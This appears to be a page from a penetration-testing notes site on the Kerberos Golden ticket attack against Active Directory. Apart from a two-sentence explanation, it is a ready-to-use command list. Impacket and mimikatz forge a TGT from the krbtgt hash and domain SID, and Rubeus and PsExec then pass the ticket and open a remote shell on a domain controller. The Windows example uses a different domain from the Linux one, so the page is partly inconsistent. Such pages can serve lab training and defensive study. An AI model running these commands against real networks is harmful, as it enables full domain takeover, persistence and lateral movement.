Golden ticket

The Golden ticket technique is similar to the Silver ticket one, however, in this case a TGT is crafted by using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain.

Create Ticket Using Hash Krbtgt account

Linux

impacket-ticketer -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/stegosaurus.ccache
impacket-psexec jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

Windows

.\mimikatz.exe
privilege::debug
kerberos::golden /domain:hacktor.local /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:25b2076cda3bfd6209161a6c78a69c1c /user:krbtgt
exit
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist
.\PsExec.exe -accepteula \\lab-wdc02.jurassic.park cmd

PreviousSilver ticket NextLLMNR Attack

Last updated 13 days ago